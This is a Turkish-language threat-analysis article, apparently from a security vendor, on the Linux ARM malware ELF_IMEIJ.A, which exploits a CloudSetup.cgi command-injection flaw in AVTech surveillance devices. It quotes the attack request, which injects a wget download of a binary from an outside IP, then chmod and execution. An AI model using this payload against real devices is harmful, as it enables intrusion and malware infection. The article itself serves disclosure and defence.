Linux, kurumsal platformlar ve Internet of Things (IoT) üreticileri için uzun zamandır tercih edilen bir işletim sistemi olmuştur. Linux tabanlı cihazlar farklı iş alanlarında, çözümleri ve hizmetleri kolaylaştıran IoT ağ geçitleri sayesinde birçok farklı sektördeki akıllı sistemlerde sürekli olarak kullanılmaktadır. Yaygın kullanımlarıyla bağlantılı olarak, Linux odaklı güvenlik tehditlerinin sayısında artış gözlemliyoruz. 2016 yılında bir dizi Linux tehdidi bildirmiştik, bunların en önemlisi Mirai adlı kötü amaçlı yazılımdı (Trend Micro tarafından ELF_MIRAI ailesi olarak tespit edildi).
Linux tehditleri listesine yeni eklenen, yakın zamanda tespit edilen Linux ARM kötü amaçlı yazılım ELF_IMEIJ.A (Trend Micro tarafından ELF_IMEIJ.A olarak tespit edildi). Bu tehdit, gözetim teknolojileri şirketi AVTech’in cihazlarındaki güvenlik açıklarını kullanıyor. Güvenlik açığı, bir güvenlik araştırma tesisi olan Search-Lab tarafından keşfedildi ve bildirildi. Ekim 2016’da AVTech’e bilgirildi. Ancak, Search-Lab’ın satıcıyla tekrar tekrar görüşmesine rağmen bir yanıt alınamadı.
Bulaşma hızı ve benzer zararlı yazılımlarla karşılaştırmalar
Kötü amaçlı yazılım, RFI’ler vasıtasıyla cgi-bin komut dosyalarıyla gelir. Uzak bir saldırgan bu isteği rastgele IP adreslerine gönderir ve güvenlik açığından yararlanmaya çalışır:
POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O / tmp / Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 / tmp / Arm1; / tmp / Arm1; HTTP / 1.1
Spesifik olarak, bildirilen AVTech CGI Dizini güvenlik açığı CloudSetup.cgi’yi, kötü amaçlı yazılım indirimini tetikleyen bir komut enjeksiyonunu çalıştırmak için kullanır. Saldırgan, aygıtı kötü amaçlı dosyayı indirmesi için kandırır ve dosyanın cihaz üzerinde çalıştırılması için izinlerini değiştirir.